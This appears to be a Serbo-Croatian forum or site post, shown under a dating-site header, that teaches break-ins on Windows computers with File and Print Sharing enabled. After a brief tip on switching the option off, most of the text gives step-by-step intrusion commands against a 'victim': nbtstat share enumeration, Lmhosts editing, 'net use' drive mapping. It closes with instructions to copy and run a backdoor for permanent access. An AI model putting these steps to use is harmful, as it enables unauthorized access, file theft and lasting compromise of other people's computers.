Registracija
Upoznavanje.net vam pomaže da se povežete sa drugim ljudima iz vašeg života.

od
Ukoliko niste znali Windows ima opciju koja se zove File and Print Sharing. Ovu opciju mozete koristiti ukoliko zelite da dijelite drajv i printer sa drugima, sto znaci da ce te dati pristup ostalim ljudima (cijeloj mrezi) fajlovima i printeru. Kada ukljucite ovu opciju, vi zapravo ostavljate jedan port otvoren (port 139) koji prihvata konekciju i razumne NETBIOS protokol.

U nekim malim firmama (sa LANom) ovo moze da bude i korisno. Na primjer, umjesto da postoji nekoliko stampaca za svaki kompjuter posebno, koristi se samo jedan printer koji se nalazi na kompjuteru na kome je ukljucen File and Print Sharing. Ali ukoliko vi koristite Fajl Sharing na vasem kucnom kompjuteru (vidjao sam likove koji ovu opciju imaju ukljucenu, a ni neznaju - jadnici!) koji je spojen na internet, svako navašu ko zna vasu IP adresu, moze imati pristup vasem računalu.

Ukoliko neznate da li je vama ukljucena Fajl Sharing opcija samo idite na Control Panel / Network. Sada trebate da vidite prozor na kome se nalazi spisak svog mreznog software-a koji ste instalirali, kao sto je TCP/IP i dugme File and Print Sharing. Provjerite da li je opcija projjerena. Ukoliko jeste (file sharing je ukljucen) onda je uncekirajte tj iskljucite.

[Krecemo sa upadom]

Sada cu vam objasniti nacin na koji mozete da upadnete na kompjuter gdje je ukljucen Fajl Sharing. Cinjenica za to da Windows nije bezvezan je to sto alati za hackiranje se nalaze u samom Windowsu. Programi koji su vam potrebni za ovo su Nbtstat.exe i Net.exe. Oba programa se mogu naci u folderu C:\Windows, ali ukoliko ih tamo ne nadjete, onda ih potrazite na instalacionom CD-u Windowsa. Ovi programi se pokrecu iz MS-DOS Prompta. Da bi ste videli pomocni meni (help) za Nbtstat.exe samo ukucajte nbtstat /? i za Net.exe ukucajte net /?. Sada krenimo u akciju. Prvo vam je potrebna IP adresa ili host kompjutera u koji upadate. Recimo da upadate u komjuter ciji je host computer.isp.com i IP adresa 123.45.67.8. Prvo sto trebate da uradite jeste to da provjerite da li je FileSharing na tom kompjuteru ukljucen. To izvedite tako sto ce te ukucati:

nbtstat -a IMEHOSTA - ili nbtstat -A IPADRESA

Bitno je da na drugom nacinu ukucate veliko A. Malo je to cudno zato sto DOS nije CASE SENSITIVE, ali tako to radi. Sada mozete da dobijete dvijee vrste odgovora. Jedan koji ce reci "Host Not Found" i koji nam govori da na kompjuteru nije ukljucen FileSharing (ili da ste pogrjesili IP adresu) i drugi koji ce vam dati spisak imena (names) type i status koji znaci da ste na pola puta od ulaska u komp. Tablicabi trebala da izgleda ovako:

Name Type Status
Host UNIQUE Registered
Hostbug GROUP Registered
Host machine UNIQUE Registered

Kako sada da upadnete? Lako! Prvo morate da podesite Lmhosts fajl koji se nalazi u C:\Windows\Lmhosts (nema ekstenziju) uz pomoc notepada, a ukoliko ga nema u Windows direktorijumu, onda ga napravite sami (samo ne zboravite da se fajl zove 'Lmhosts' i da NEMA EKSTENZIJU). Da bi ste ga napravili samo otvorite Lmhosts fajl u notepadu, unesite zrtvinu IP asresu, pritisnite TAB, i unesite 'Share Name' - ime koje ste nasli uz pomoc nbtstat-a (u tabeli). Sada snimite ovaj fajl i izadjite iz notepada. Sada postoje dva nacina na koji mozete da pristupite kompjuteru: najlaksi, lak i kul nacin!!!

[Najlaksi nacin]

Imate IP adresu? Imate Share name? OK! Idite na START > RUN i samo unesite sljedece:
//IPADRESA/SHARENAME/
na primjer:
//123.45.67.8/hostbug/
Ovime ce vam se pojaviti prozor slican onome koji dobijete kada kliknete na My Computer ikonu iz koga ce te moci da pretrazujete zrtvin kompjuter.

[Lak nacin]

Ukoliko ne zelite previse da se mucite onda samo idite na START / FIND / COMPUTERS i unesite IP adresu kompjutera u koji zelite da upadnete. Ukoliko ste dobro konfigurirali Lmhosts fajl, izacice vam prozor sa fajlovima iz zrtvinog kompjutera.takticki bice kao da radite na svom kompjuteru.

[Kul nacin]

Za kul nacin upada u komp uz pomoc file shareinga bice vam potreban program Net.exe. Savetujem vas da prvo procitate pomoc tako sto ce te unjeti net /?. (u DOS prozoru). Takodje mozete koristiti i komandu: net opcija /? - gdje je opcija odredjena opcija za koju vam treba pomoc.

Da bi ste pristupili kompu na ovaj nacin morate prvo kreirati virtualni drajv. Ovo ce te uraditi ako ukucate:
net use drajv \\[IPADRESA]\[SHARENAME]
Sada cemo prouciti komandu:
- 'drajv' je oznaka virtualnog drajva koji moze biti f: g: z: x: itd...
- '[IPADRESA]' je IP adresa kompjutera u koji upadamo (npr. 123.45.67.8)
- '[SHARENAME]' je Share Name tj. ime koje ste nasli uz pomoc nbtstat-a (u tabeli).

Komanda izgleda nesto slicno ovome:
net use x:\\123.45.67.8\hostbug
Nakon sto izvrsite ovo, samo ukucajte slovo drajva (u nasem primjeru xSmile i pretrazite drajv uz pomoc MS-DOS komandi.

Mozete dodatno uljepšati stvar:
Iskopirajte backdoor (zadnja vrata) na virtualni drajv i pokrenite ga kako bi uvjek imali pristup ovom kompjuteru. Ukoliko kopirate i pokrecete backdoor uradite to na sljedeći nacin:
copy c:\backdoor.exe x:
x: run=%SystemRoot%\backdoor.exe

Ovo ce pokrenuti backdoor na zrtvinom kompjuteru i omoguciti vam stalni pristup ovom kompjuteru. Ovo je kraj teksta o upadima na kompjutere koji imaju ukljucen File Sharing...